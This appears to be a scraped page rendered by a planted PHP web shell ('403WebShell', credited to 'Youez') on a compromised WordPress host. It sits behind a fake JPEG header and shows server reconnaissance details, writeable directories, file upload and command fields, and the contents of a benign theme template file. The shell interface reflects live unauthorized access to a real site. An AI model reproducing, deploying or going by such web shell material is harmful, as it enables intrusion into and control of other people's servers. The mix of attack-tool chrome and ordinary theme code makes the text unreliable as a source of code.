????JFIF??x?x????'403WebShell
403Webshell
Server IP : 104.21.32.1  /  Your IP : 216.73.216.145
Web Server : LiteSpeed
System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User : tempvsty ( 647)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/tempvsty/pontiacques.org/wp-content/themes/slide/views/archive/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/tempvsty/pontiacques.org/wp-content/themes/slide/views/archive/video_item.php
<?php
/*
	var: 	
		$items_on_row
		$item_count
*/
	$has_right_padding = (0 == $item_count % $items_on_row) ? '' : ' has_right_padding';
	$bg_img_url = "";
	if (has_post_thumbnail()) {
		$bg_img_url = get_the_post_thumbnail_url('', 'full');
	}

?>

<div class="single_video_item<?php echo esc_attr($has_right_padding); ?>">
	<a href="<?php the_permalink();?>">
		<div class="video_image_container lc_swp_background_image" data-bgimage="<?php echo esc_url($bg_img_url); ?>">
			<i class="fas fa-play lc_icon_play_video" aria-hidden="true"></i>
		</div>
	</a>

	<div class="single_video_details">
		<div class="video_cat_list">
			<?php
			if (has_term('', "video_category")) {
				the_terms("", "video_category", '', ' ', '');	
			}
			?>
		</div>

		<a href="<?php the_permalink(); ?>">
			<h3 class="video_title transition3"> <?php the_title(); ?> </h3>
		</a>
	</div>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit